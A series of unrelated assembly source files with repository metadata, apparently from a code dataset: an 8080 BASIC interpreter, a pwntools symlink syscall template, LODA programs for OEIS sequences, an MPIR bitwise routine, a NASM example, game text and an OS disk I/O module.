;GO SHIFT TO RIGHT OR 30H ;ZONE LD (DE),A ;PUT TO BUFFER INC DE ;POINT NEXT LD A,(HL) ;LOAD BYTE AND 0FH ;MASK OR 30H ;ZONE LD (DE),A ;PUT TO BUFFER INC DE ;POINT NEXT INC HL ;AND NEXT LINE BYTE RET ;RETURN ; ; TSTCH EQU $ ; ;TEST IF INPUT CHAR ON KEYBOARD ;IF THERE IS, THEN READ IT ;TERMINATE IF CONTROL-C ;TOGGLE OUTPUT SW IF CONTROL-O ; ; IN A,(TTY-1) ;GET STATUS ; AND 40H ;MASK FOR RXRDY IN A,(TTY+1) ;**UM** AND 2 ;**UM** RET Z ;RETURN IF NOT GETCH IN A,(TTY) ;ELSE, READ THE CHAR AND 7FH ;TURN OFF PARITY CP 0FH ;TEST IF CONTROL-O JP Z,CONTO ;BRIF IS CP 03H ;TEST IF CONTROL-C RET NZ ;RETURN IF NOT CALL CRLF ;PRINT CR/LF JP READY ;QUIT WHAT YOU WERE DOING CONTO LD A,(OUTSW) ;GET SWITCH XOR 01H ;TOGGLE LD (OUTSW),A ;RESTORE LD A,0AH ;GET A LF RET ;RETURN ; ; ZEROM EQU $ ; ;MOVE STRING OF ZEROS TO (HL)+... CNT IN B ; LD (HL),0 ;MOVE ONE ZERO INC HL ;POINT NEXT DEC B ;DECR CTR JP NZ,ZEROM ;LOOP RET ;RETURN ; ; COPYH EQU $ ; ;COPY STRING FROM (HL) TO (DE) ;COUNT IN B ; LD A,(HL) ;GET A CHAR LD (DE),A ;PUT IT DOWN INC HL ;POINT NEXT INC DE ;DITTO DEC B ;DECR CTR JP NZ,COPYH ;LOOP RET ;RETURN ; ; COPYD EQU $ ; ;COPY STRING FROM (DE) TO (HL) ;COUNT IN B ; EX DE,HL ;FLIP DE/HL CALL COPYH ;GO COPY EX DE,HL ;THEN FLIP BACK RET ;RETURN ; ; COMP2 EQU $ ; ;CONTINUE COMP SUBROUTINE (RST RST2) ; CP (HL) ;COMPARE THE CHAR RET NZ ;RETURN IF NOT EQUAL INC DE ;POINT NEXT INC HL ;DITTO JP RST2 ;LOOP ; ; ULERR LD BC,'UL' ;UNDEFINED LINE NUMBER RST RST3 OVERR LD BC,'OV' ;DIV BY ZERO/OVERFLOW/UNDERFLOW RST RST3 STERR LD BC,'ST' ;ERROR IN EXPRESSION STACK RST RST3 SNERR LD BC,'SN' ;SYNTAX ERROR RST RST3 RTERR LD BC,'RT' ;RETURN & NO GOSUB RST RST3 DAERR LD BC,'DA' ;OUT OF DATA RST RST3 FOERR LD BC,'FO' ;MORE THAN 8 NESTED FOR/NEXT OR RST RST3 NXERR LD BC,'NX' ;FOR & NO NEXT / NEXT & NO FOR RST RST3 ; ; ; ; PACK EQU $ ; ;PACK LINE NUMBER FROM (HL) TO BC ; ; RST RST1 ;SKIP LEADING SPACES LD BC,0 ;CLEAR B AND C LD A,4 ;INIT DIGIT COUNTER LD (PRSW),A ;SAVE A PK1 LD A,(HL) ;GET CHAR CALL NUMXR ;TEST FOR NUMERIC RET NZ ;RETURN IF NOT NUMERIC AND 0FH ;STRIP OFF ZONE LD D,A ;SAVE IT LD A,(PRSW) ;GET COUNT DEC A ;SUBTRACT ONE JP M,SNERR ;BRIF MORE THAN 4 DIGITS LD (PRSW),A ;SAVE CTR LD E,4 ;4 BIT SHIFT LOOP PK3 LD A,C ;GET LOW BYTE RLA ;ROTATE LEFT 1 BIT LD C,A ;REPLACE LD A,B ;GET HIGH BYTE RLA ;ROTATE LEFT 1 BIT LD B,A ;REPLACE DEC E ;DECR CTR JP NZ,PK3 ;LOOP LD A,C ;GET LOW OR D ;PUT DIGIT IN RIGHT HALF OF BYTE LD C,A ;REPLACE INC HL ;POINT NEXT BYTE JP PK1 ;LOOP ; ; ; SQUIS EQU $ ; ;COMPRESS THE EXPR STACK ;TO ADDR IN HL ;FROM ADDR IN DE ;COUNT IN B ; SQUI2 INC DE ;POINT NEXT SEND INC HL ;POINT NEXT RECEIVE LD A,(DE) ;GET A CHAR LD (HL),A ;PUT IT DOWN DEC B ;DECR CTR JP NZ,SQUI2 ;LOOP RET ;RETURN ; ; GTEMP EQU $ ; ;GETS FOUR BYTE TEMPORARY STORAGE AREA, ;STORES THE FACC THERE, ;PUTS ADDR OF AREA IN EXPR STACK (HL) ; EX DE,HL ;SAVE HL IN DE EX (SP),HL ;EXCHANGE 0 AND RET ADDR PUSH HL ;PUT NEW RET ADDR PUSH HL ;DO IT AGAIN LD HL,0 ;ZERO HL ADD HL,SP ;GET SP ADDR IN HL INC HL ;PLUS ONE INC HL ;PLUS ONE MORE (POINT TO NEW ARE PUSH BC ;SAVE CTRS PUSH DE ;SAVE EXPR ADDR PUSH HL ;SAVE TEMP ADDR LD A,(SPCTR) ;GET WORD COUNTER INC A ;INCR IT LD (SPCTR),A ;RESTORE IT RST RST6 ;GO STORE FACC POP DE ;RESTORE TEMP ADDR POP HL ;RESTORE EXPR ADDR POP BC ;RESTORE CTRS SADR INC HL ;POINT NEXT BYTE LD (HL),D ;HIGH BYTE TO EXPR STACK INC HL ;POINT NEXT LD (HL),E ;LOW BYTE TO EXPR STACK INC HL ;POINT NEXT LD (HL),0E3H ;CODE = DATA RET ;RETURN ; ; ALPHA EQU $ ; ;TESTS THE CHAR AT (HL) ;RETURNS WITH Z SET IF CHAR IS ALPHA (A-Z) ;RETURNS WITH Z OFF IF NOT ALPHA ;CHAR IS LEFT IN REG A ; RST RST1 ;SKIP LEADING SPACES CP 'A' ;TEST IF A OR HIGHER RET C ;RETURN IF NOT ALPHA (Z IS OFF) CP 'Z'+1 ;TEST IF Z OR LESS RET NC ;RETURN IF NOT < Z (Z OFF) CP A ;TURN ON Z RET ;RETURN ; ; NUMER EQU $ ; ;TESTS THE CHAR AT (HL) ;RETURNS WITH Z SET IF NUMERIC (0-9) ;ELSE, Z IS OFF ;CHAR IS LEFT IN THE A REG ; RST RST1 ;SKIP LEADING SPACES NUMXR CP '0' ;TEST IF ZERO OR GREATER RET C ;RETURN IF LESS THAN ZERO CP '9'+1 ;TEST IF 9 OR LESS RET NC ;RETURN IF NOT NUMERIC CP A ;SET Z RET ;RETURN ; ; RIGHT EQU $ ; ;SHIFT THE LEFTMOST 4 BITS OF REG A RIGHT FOUR BITS ; AND 0F0H ;ISOLATE LEFT RRA ;SHIFT ONCE RRA ;AGAIN RRA ;AGAIN RRA ;ONE LAST TIME RET ;RETURN ; ; SEARC EQU $ ; ;SEARCES FOR THE VARIABLE IN DE ;RETURNS WITH ADDR OF DATA AREA FOR VARIABLE ; PUSH HL ;SAVE HL LD HL,(DATAB) ;GET ADDR OF DATA POOL LD BC,-6 ;LENGTH OF EACH ENTRY SCH1 LD A,(HL) ;GET THE BYTE OR A ;TEST IF END JP Z,SCH3 ;BRIF END CP D ;COMPARE 1ST CHAR JP NZ,SCH2 ;BRIF NOT EQUAL DEC HL ;POINT NEXT LD A,(HL) ;LOAD 2ND DIGIT INC HL ;POINT BACK CP E ;COMPARE 2ND CHAR JP NZ,SCH2 ;BRIF NOT EQUAL ADD HL,BC ;POINT NEXT ENTRY INC HL ;PLUS ONE EX DE,HL ;FLIP/FLOP POP HL ;RESTORE HL RET ;RETURN SCH2 ADD HL,BC ;MINUS SIX JP SCH1 ;LOOP SCH3 LD (HL),D ;PUT 1ST CHAR DEC HL ;POINT NEXT LD (HL),E ;PUT 2ND CHAR LD B,4 ;LOOP CTR SCH4 DEC HL ;POINT NEXT LD (HL),0 ;ZERO THE VALUE DEC B ;DECR CTR JP NZ,SCH4 ;LOOP DEC HL ;POINT NEXT LD (HL),B ;MOVE ZERO TO NEW END INC HL ;POINT ADDR OF VARIABLE EX DE,HL ;PUT LOCATION TO DE POP HL ;RESTORE HL RET ;RETURN ; ; VAR EQU $ ; ; ;TEST (HL) FOR A VARIABLE NAME ;PUTS THE NAME IN DE IF FOUND ; CALL ALPHA ;TEST IF ALPHA JP NZ,SNERR ;BRIF NOT ALPHA LD D,A ;FIRST CHAR LD E,' ' ;DEFAULT INC HL ;POINT NEXT CALL NUMER ;TEST IF NUMERIC RET NZ ;RETURN IF NOT NUMERIC LD E,A ;SAVE 2ND CHAR INC HL ;POINT NEXT RST RST1 ;SKIP SPACES RET ;THEN RETURN ; ; ERROR EQU $ ; ;CONTINUE ERROR ROUTINE (RST RST3) ; LD (HL),C ;PUT 2ND CHAR INC HL ;POINT NEXT LD (HL),0FEH ;MARK END CALL TERMO ;GO PRINT IT LD HL,ERRXR ;POINT MESG CALL OUT1 ;GO PRINT IT LD DE,IOBUF ;POINT BUFFER LD HL,(LINE) ;GET ADDR OF LINE NUMBER CALL LINEO ;UNPACK LINE NUMBER XOR A ;GET END CODE LD (DE),A ;PUT TO BUFFER CALL TERMO ;PRINT IT JP GETCM ;GO GET NEXT COMMAND *HEADING IMSAI 8080 4K BASIC LISTL DEFM 'LIS' DEFB 0 NEWLI DEFM 'NEW' DEFB 0 RUNLI DEFM 'RUN' DEFB 0 RNDLI DEFM 'RND' DEFB 0 ABSLI DEFM 'ABS' DEFB 0 SQRLI DEFM 'SQR' DEFB 0 SGNLI DEFM 'SGN' DEFB 0 JMPTB EQU $ IFLIT DEFM 'IF' DEFB 0 DEFW IF READL DEFM 'READ' DEFB 0 DEFW READ DATAL DEFM 'DATA' DEFB 0 DEFW RUN FORLI DEFM 'FOR' DEFB 0 DEFW FOR NEXTL DEFM 'NEXT' DEFB 0 DEFW NEXT GOSUX DEFM 'GOSUB' DEFB 0 DEFW GOSUB RETLI DEFM 'RET' DEFB 0 DEFW RETUR INPUX DEFM 'INPUT' DEFB 0 DEFW INPUT PRINX DEFM 'PR' INTLI DEFM 'INT' DEFB 0 DEFW PRINT DEFM '?' DEFB 0 DEFW PRINT GOTOL DEFM 'GO' TOLIT DEFM 'TO' DEFB 0 DEFW GOTO LETLI DEFM 'LET' DEFB 0 DEFW LET STOPL DEFM 'STO' DEFB 0 DEFW READY ENDLI DEFM 'END' DEFB 0 DEFW RUN REMLI DEFM 'REM' DEFB 0 DEFW RUN DEFB 0 ;END OF TABLE STEPL DEFM 'STEP' DEFB 0 THENL DEFM 'THEN' DEFB 0 ERRXR DEFM ' ERR @ ' DEFB 0FEH ONE DEFW 1000H ;CONSTANT ONE DEFW 0 TWO DEFW 2000H ;CONSTANT TWO DEFW 0 THREE DEFW 3000H ;CONSTANT THREE DEFW 0 RNDX DEFW 837FH ;RANDOMIZER DEFW 1974H ROMEN EQU $ ;END OF READ-ONLY-MEMORY *HEADING IMSAI 8080 4K BASIC ORG 1000H ;RAM AREA RAM EQU $ ;ALIGN RAM ON 4K BOUNDARY ;TTY EQU 1 ;DEVICE ADDRESS FOR TERMINAL TTY EQU 2 ;**UM** NULLI DEFS 2 IOBUF DEFS 40 ;INPUT/OUTPUT BUFFER FACC DEFS 4 FTEMP DEFS 10 REL DEFS 1 ;HOLDS THE RELATION IN AN IF STMT DIVSW DEFS 1 ;0=NORMAL DIVIDE, 1=DIVIDE FOR R TVAR1 DEFS 4 ;TEMP STORAGE TVAR2 DEFS 4 ;DITTO ORIGS DEFS 4 ;HOLDS ORIG NUMBER FOR SQR TSTSQ DEFS 4 ;HOLDS TRIAL SQUARE ROOT TST2S DEFS 4 ;HOLDS TRIAL SQUARE ROOT ** 2 SQRX DEFS 4 ;TEMP STORAGE FOR SQUARE ROOT EXPRS DEFS 2 ;HOLDS ADDR OF EXPR PARCT DEFS 1 SPCTR DEFS 1 PRSW DEFS 1 ADDR1 DEFS 2 ;HOLDS TEMP ADDRESS ADDR2 DEFS 2 ;HOLDS TEMP ADDRESS ADDR3 DEFS 2 ;HOLDS STMT ADDRESS DURING EXPR STMT DEFS 2 ;HOLDS ADDR OF CURRENT STATEMENT INDX DEFS 2 ;HOLDS VARIABLE NAME OF FOR/NEXT OUTSW DEFS 1 ;OUTPUT SUPPRESS IF ON RUNSW DEFS 1 ;0=RUN MODE, 1=IMMEDIATE MODE COLUM DEFS 1 ;CURRENT TTY COLUM RNDNU DEFS 4 DASTM DEFS 2 ;HOLDS LINE ADDRESS OF CURRENT D LINE DEFS 2 ;HOLD ADDR OF PREV LINE NUM STACK DEFS 2 ;HOLDS ADDR OF START OF RETURN FORNE DEFS 97 PROMP DEFS 1 ;HOLDS PROMPT CHARACTER IMMED DEFS 70 ;IMMEDIATE COMMAND STORAGE AREA DATAP DEFS 2 ;ADDR OF CURRENT DATA STMT DATAB DEFS 2 ;ADDRESS OF DATA POOL PROGE DEFS 2 ;ADDR OF PROG POOL END DEFS 1 ;THIS HAS LOW VALUE AT RUN TIME BEGPR EQU $ ;PROGRAM AREA STARTS HERE ; ; END BASIC

37.885193

65

0.416202

69cad67bd102d5e266d20ae5faedf7254215bd8d

277

asm

Assembly

pwnlib/shellcraft/templates/thumb/linux/symlink.asm

IMULMUL/python3-pwntools

61210a68cd88e9084c72292d3119c38c44f07966

[ "MIT" ]

325

2016-01-25T08:38:06.000Z

2022-03-30T14:31:50.000Z

pwnlib/shellcraft/templates/thumb/linux/symlink.asm

IMULMUL/python3-pwntools

61210a68cd88e9084c72292d3119c38c44f07966

[ "MIT" ]

8

2016-08-23T10:15:27.000Z

2019-01-16T02:49:34.000Z

pwnlib/shellcraft/templates/thumb/linux/symlink.asm

IMULMUL/python3-pwntools

61210a68cd88e9084c72292d3119c38c44f07966

[ "MIT" ]

71

2016-07-13T10:03:52.000Z

2022-01-10T11:57:34.000Z

<% from pwnlib.shellcraft.thumb.linux import syscall %> <%page args="from_, to"/> <%docstring> Invokes the syscall symlink. See 'man 2 symlink' for more information. Arguments: from(char): from to(char): to </%docstring> ${syscall('SYS_symlink', from_, to)}

19.785714

71

0.67148

9d97cf43018628dd0768fb56fc214c12ccb00059

681

asm

Assembly

programs/oeis/306/A306447.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/306/A306447.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/306/A306447.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

; A306447: Number of (undirected) Hamiltonian cycles in the n-antiprism graph. ; 3,9,16,29,56,110,225,469,991,2110,4511,9666,20736,44511,95575,205253,440828,946817,2033628,4367986,9381949,20151433,43283195,92967882,199685571,428904390,921243268,1978737467,4250128235,9128846273,19607840040,42115660645,90460186816,194299347958,417335382041,896394264573,1925364376407,4135488287382,8882611304551,19078952255498,40979663151752,88020178967063,189058457525823,406078478611453,872215572629908,1873430987378377,4023940611249380,8643018158635770 mul $0,2 mov $1,$0 add $0,1 add $1,1 cal $0,1609 ; a(1) = a(2) = 1, a(3) = 4; thereafter a(n) = a(n-1) + a(n-3). sub $1,4 add $1,$0 add $1,5

56.75

459

0.79442

0c76bb2a1df4b49f1672fa1e91a985c345e197f3

752

asm

Assembly

oeis/112/A112699.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/112/A112699.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/112/A112699.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A112699: Partial sum of Catalan numbers A000108 multiplied by powers of 5. ; Submitted by Jamie Morken(s2) ; 1,6,56,681,9431,140681,2203181,35718806,594312556,10090406306,174113843806,3044524000056,53828703687556,960689055250056,17284175383375056,313147365080640681,5708299647795484431,104619424830900953181,1926666467677580640681,35634536760341154859431,661637842195521818921931,12328063079851161467359431,230439491436021815764234431,4320028773114221583830640681,81204307268664377223479078181,1530177248146340387355315015681,28899666131391331689845549390681,546964991421385809915553557203181 lpb $0 mov $2,$0 sub $0,1 seq $2,108 ; Catalan numbers: C(n) = binomial(2n,n)/(n+1) = (2n)!/(n!(n+1)!). add $1,$2 mul $1,5 lpe add $1,1 mov $0,$1

53.714286

485

0.823138

5287e5e339d6676c0243a2c00deb230905574be4

506

asm

Assembly

programs/oeis/336/A336698.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

22

2018-02-06T19:19:31.000Z

2022-01-17T21:53:31.000Z

programs/oeis/336/A336698.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

41

2021-02-22T19:00:34.000Z

2021-08-28T10:47:47.000Z

programs/oeis/336/A336698.asm

neoneye/loda

afe9559fb53ee12e3040da54bd6aa47283e0d9ec

[ "Apache-2.0" ]

5

2021-02-24T21:14:16.000Z

2021-08-09T19:48:05.000Z

; A336698: a(n) = A000265(1+A000265(sigma(n))), where A000265(k) gives the odd part of k. ; 1,1,1,1,1,1,1,1,7,5,1,1,1,1,1,1,5,5,3,11,1,5,1,1,1,11,3,1,1,5,1,1,1,7,1,23,5,1,1,23,11,1,3,11,5,5,1,1,29,47,5,25,7,1,5,1,3,23,1,11,1,1,7,1,11,5,9,1,1,5,5,49,19,29,1,9,1,11,3,47,61,1,11,1,7,17,1,23,23,59,1,11,1,5,1,1,25,43,5,109 seq $0,203 ; a(n) = sigma(n), the sum of the divisors of n. Also called sigma_1(n). sub $0,1 seq $0,110963 ; Fractalization of Kimberling's sequence beginning with 1. mul $0,2 sub $0,1

56.222222

229

0.628458

287a8c410e5630633f743c94fc7f75a5a4d32735

2,629

asm

Assembly

externals/mpir-3.0.0/mpn/x86_64w/k8/nand_n.asm

JaminChan/eos_win

c03e57151cfe152d0d3120abb13226f4df74f37e

[ "MIT" ]

12

2021-09-29T14:50:06.000Z

2022-03-31T15:01:21.000Z

externals/mpir-3.0.0/mpn/x86_64w/k8/nand_n.asm

JaminChan/eos_win

c03e57151cfe152d0d3120abb13226f4df74f37e

[ "MIT" ]

15

2021-12-24T22:53:49.000Z

2021-12-25T10:03:13.000Z

LibSource/mpir/mpn/x86_64w/k8/nand_n.asm

ekzyis/CrypTool-2

1af234b4f74486fbfeb3b3c49228cc36533a8c89

[ "Apache-2.0" ]

10

2021-10-17T19:46:51.000Z

2022-03-18T02:57:57.000Z

; PROLOGUE(mpn_nand_n) ; Copyright 2008 Jason Moxham ; ; Windows Conversion Copyright 2008 Brian Gladman ; ; This file is part of the MPIR Library. ; The MPIR Library is free software; you can redistribute it and/or modify ; it under the terms of the GNU Lesser General Public License as published ; by the Free Software Foundation; either version 2.1 of the License, or (at ; your option) any later version. ; The MPIR Library is distributed in the hope that it will be useful, but ; WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY ; or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public ; License for more details. ; You should have received a copy of the GNU Lesser General Public License ; along with the MPIR Library; see the file COPYING.LIB. If not, write ; to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, ; Boston, MA 02110-1301, USA. ; ; void mpn_nand_n(mp_ptr, mp_srcptr, mp_srcptr, mp_size_t) ; rdi rsi rdx rcx ; rcx rdx r8 r9 %include "yasm_mac.inc" CPU Athlon64 BITS 64 %define reg_save_list rbx, rsi, rdi FRAME_PROC mpn_nand_n, 0, reg_save_list lea rdi, [rcx+r9*8] lea rsi, [rdx+r9*8] lea rdx, [r8+r9*8] mov rcx, r9 neg rcx add rcx, 3 jc .2 mov r8, [rdx+rcx*8-24] mov r9, [rdx+rcx*8-16] mov r8, [rdx+rcx*8-24] mov r9, [rdx+rcx*8-16] add rcx, 4 mov r10, [rdx+rcx*8-40] mov r11, [rdx+rcx*8-32] jc .1 xalign 16 .0: and r8, [rsi+rcx*8-56] not r8 and r9, [rsi+rcx*8-48] and r10, [rsi+rcx*8-40] and r11, [rsi+rcx*8-32] mov [rdi+rcx*8-56], r8 not r9 not r10 mov [rdi+rcx*8-48], r9 not r11 mov r8, [rdx+rcx*8-24] mov r9, [rdx+rcx*8-16] mov [rdi+rcx*8-40], r10 mov [rdi+rcx*8-32], r11 add rcx, 4 mov r10, [rdx+rcx*8-40] mov r11, [rdx+rcx*8-32] jnc .0 .1: and r8, [rsi+rcx*8-56] not r8 and r9, [rsi+rcx*8-48] and r10, [rsi+rcx*8-40] and r11, [rsi+rcx*8-32] mov [rdi+rcx*8-56], r8 not r9 not r10 mov [rdi+rcx*8-48], r9 not r11 mov [rdi+rcx*8-40], r10 mov [rdi+rcx*8-32], r11 .2: cmp rcx, 2 jg .6 je .5 jp .4 .3: mov r8, [rdx-24] and r8, [rsi-24] not r8 mov [rdi-24], r8 .4: mov r8, [rdx-16] and r8, [rsi-16] not r8 mov [rdi-16], r8 .5: mov r8, [rdx-8] and r8, [rsi-8] not r8 mov [rdi-8], r8 .6: END_PROC reg_save_list end

26.29

77

0.58121

de30b87fdd335c3f2d233e9b48c953b6c8b2e3b8

434

asm

Assembly

NULLTerminatingBytes/nullTerminatingBytes.asm

slowy07/learnAsm

d278573eecd96e0e56f720c92fe7783d33528e43

[ "MIT" ]

1

2021-10-14T06:35:29.000Z

NULLTerminatingBytes/nullTerminatingBytes.asm

coderzhaxor/asmSourceCode

95a349e5b6e4fb52d29528f15635708d2273e676

[ "MIT" ]

null

NULLTerminatingBytes/nullTerminatingBytes.asm

coderzhaxor/asmSourceCode

95a349e5b6e4fb52d29528f15635708d2273e676

[ "MIT" ]

1

2021-09-30T03:22:35.000Z

; compile ; nasm -f elf nullTerminatingBytes.asm ; link (64 bit system require elf_i386) ld -m elf_i386 nullTerminatingBytes.o -o nullTerminatingBytes %include 'function.asm' SECTION .data msg1 db 'this print will be output', 0Ah, 0h msg2 db 'this is how recycle in nasm', 0Ah. 0h SECTION .text global _start _start: mov eax, msg1 call sprint mov eax, msg2 call sprint call quit

19.727273

101

0.672811

65b793e912e41b2930820b81f90793207b285355

368

asm

Assembly

programs/oeis/078/A078716.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/078/A078716.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

programs/oeis/078/A078716.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

; A078716: Sequence has period 9 and differences between successive terms are 4, -3, 4, -3, 4, -3, 4, -3, -4. ; 1,5,2,6,3,7,4,8,5,1,5,2,6,3,7,4,8,5,1,5,2,6,3,7,4,8,5,1,5,2,6,3,7,4,8,5,1,5,2,6,3,7,4,8,5,1,5,2,6,3,7,4,8,5,1,5,2,6,3,7,4,8,5,1,5,2,6,3,7,4,8,5,1 mod $0,9 mov $1,$0 mov $2,7 lpb $0 div $0,2 mul $0,2 mul $2,2 lpe add $1,$2 sub $1,7 div $1,2 add $1,1

23

147

0.55163

9142964c0aab5b91c37ce7da72d09947d219b2c3

484

asm

Assembly

oeis/019/A019766.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/019/A019766.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/019/A019766.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A019766: Decimal expansion of 2*e/9. ; 6,0,4,0,6,2,6,2,8,5,4,6,4,5,4,4,9,6,7,4,6,7,3,0,5,4,9,1,8,9,4,8,0,5,5,5,0,5,7,1,6,6,0,2,0,8,2,2,2,1,3,2,3,8,8,8,1,5,4,8,3,6,1,7,1,6,4,6,1,4,7,3,4,1,1,8,9,9,4,6,5,4,6,0,3,0,7,1,5,0,7,8,3,3,7,0,3,1,7,2 add $0,1 mov $2,1 mov $3,$0 mul $3,5 lpb $3 mul $2,$3 add $1,$2 cmp $4,0 mov $5,$0 div $5,3 add $5,$4 div $1,$5 div $2,$5 sub $3,1 cmp $4,0 lpe div $1,9 mul $1,2 mov $6,10 pow $6,$0 div $2,$6 div $1,$2 mod $1,10 mov $0,$1

17.285714

201

0.510331

497fbce32a0fc6af9592b55dedcdf7489e00c1ac

411

asm

Assembly

text/maps/cerulean_pokecenter.asm

adhi-thirumala/EvoYellow

6fb1b1d6a1fa84b02e2d982f270887f6c63cdf4c

[ "Unlicense" ]

16

2018-08-28T21:47:01.000Z

2022-02-20T20:29:59.000Z

text/maps/CeruleanPokecenter.asm

JStar-debug2020/pokemon-rby-dx

c2fdd8145d96683addbd8d9075f946a68d1527a1

[ "MIT" ]

7

2020-07-16T10:48:52.000Z

2021-01-28T18:32:02.000Z

text/maps/CeruleanPokecenter.asm

JStar-debug2020/pokemon-rby-dx

c2fdd8145d96683addbd8d9075f946a68d1527a1

[ "MIT" ]

2

2021-03-28T18:33:43.000Z

2021-05-06T13:12:09.000Z

_CeruleanPokecenterText2:: text "That BILL!" para "I heard that" line "he'll do whatever" cont "it takes to get" cont "rare #MON!" done _CeruleanPokecenterText3:: text "Have you heard" line "about BILL?" para "Everyone calls" line "him a #MANIAC!" para "I think people" line "are just jealous" cont "of BILL, though." para "Who wouldn't want" line "to boast about" cont "their #MON?" done

16.44

26

0.688564

49f607271de1079b5febd670b546cb7a457102a4

945

asm

Assembly

programs/oeis/192/A192951.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/192/A192951.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

programs/oeis/192/A192951.asm

jmorken/loda

99c09d2641e858b074f6344a352d13bc55601571

[ "Apache-2.0" ]

null

; A192951: Coefficient of x in the reduction by x^2 -> x+1 of the polynomial p(n,x) defined at Comments. ; 0,1,3,9,20,40,74,131,225,379,630,1038,1700,2773,4511,7325,11880,19252,31182,50487,81725,132271,214058,346394,560520,906985,1467579,2374641,3842300,6217024,10059410,16276523,26336025,42612643,68948766,111561510,180510380,292071997,472582487,764654597,1237237200,2001891916,3239129238,5241021279,8480150645,13721172055,22201322834,35922495026,58123818000,94046313169,152170131315,246216444633,398386576100,644603020888,1042989597146,1687592618195,2730582215505,4418174833867,7148757049542,11566931883582,18715688933300,30282620817061,48998309750543,79280930567789,128279240318520,207560170886500,335839411205214,543399582091911,879238993297325,1422638575389439,2301877568686970,3724516144076618,6026393712763800 lpb $0 sub $0,1 add $5,1 add $4,$5 add $1,$4 add $2,1 mov $3,$2 add $2,$1 trn $4,$1 mov $1,$3 add $5,2 lpe

59.0625

711

0.814815

f2319b24c9da421674c05529d71c953988532d31

7,375

asm

Assembly

src/diskio.asm

drdanick/apricot-os

65fcc85313986f9c6a8aa5738c4b19fa5544caac

[ "MIT" ]

null

src/diskio.asm

drdanick/apricot-os

65fcc85313986f9c6a8aa5738c4b19fa5544caac

[ "MIT" ]

null

src/diskio.asm

drdanick/apricot-os

65fcc85313986f9c6a8aa5738c4b19fa5544caac

[ "MIT" ]

1

2018-07-10T19:35:07.000Z

; asmsyntax=apricos ; =================================== ; == == ; == ApricotOS DiskIO routines == ; == == ; == Revision 1 == ; == == ; == (C) 2014-17 Nick Stones-Havas == ; == == ; == == ; == Provides a collection of == ; == Disk IO utility routines. == ; == == ; =================================== ; #name "diskio" #segment 6 #include "apricotosint.asm" #include "portout.asm" #include "faulthandler.asm" #include "osutil.asm" #include "memutil.asm" ; TODO: These routines need to be tested and verified ; Macro to select a disk track ; ; Arguments: ; track - The track number to select ; ; Notes: ; The currently selected accumulator is used ; as temporary storage. ; ; Requires that portout.asm be included. #macro TRACKSEL track { LARl track PORTOUT_DISK_TRACKSEL } ; Function pointers .nearptr COPYFROMDSK .nearptr COPYTODSK .nearptr COPYBULKFROMDSK .nearptr COPYBULKTODSK ; ; Copies a segment from the currently selected track ; into memory. ; $a8 - The source disk segment number ; $a9 - The destination memory segment number ; ; Volatile registers: ; $a8 ; $a9 ; $a10 ; $a11 ; COPYFROMDSK: ASET 8 PORTOUT_DISK_READSECTOR ; Check that the segment number is valid by masking out valid range bits SPUSH LARl 0xC0 ; 0xC0 masks away all but the invalid segment number bits. Valid values will mask to 0. SPOP AND BRnp SEGNUM_ERROR LARh 0xFE ; Use $a8 to hold the base address of the disk paging region ASET 10 OS_SYSCALL MEMUTIL_SEGCPY OS_SYSCALL_RET ; ; Copies a segment of memory into a given segment of ; the currently selected disk track. ; $a8 - The source memory segment number ; $a9 - The destination disk segment number ; ; Volatile registers: ; $a8 ; $a9 ; $a10 ; $a11 ; COPYTODSK: ASET 9 SPUSH ; Save this for later ; Check that the segment number is valid by masking out valid range bits SPUSH ; We need the segment number in the stack again for this operation LARl 0xC0 ; 0xC0 masks away all but the invalid segment number bits. Valid values will mask to 0. SPOP AND BRnp SEGNUM_ERROR LARh 0xFE ; Use $a9 to hold the base address of the disk paging region ASET 10 OS_SYSCALL MEMUTIL_SEGCPY ; Write the data back to disk at the given segment SPOP PORTOUT_DISK_WRITESECTOR OS_SYSCALL_RET ; ; Copies a series of disk segments into memory ; starting from a given track and segment number. ; $a8 - The source disk segment number ; $a9 - The destination memory segment number ; $a10 - The source disk track number ; $a11 - The number of segments to copy ; ; Volatile registers: ; $a8 ; $a9 ; $a10 ; $a11 ; COPYBULKFROMDSK: ; Use $a0, $a1, $a2, $a3 in place of $a8, $a9, $a10, and $a11 ; Store the current values onto the 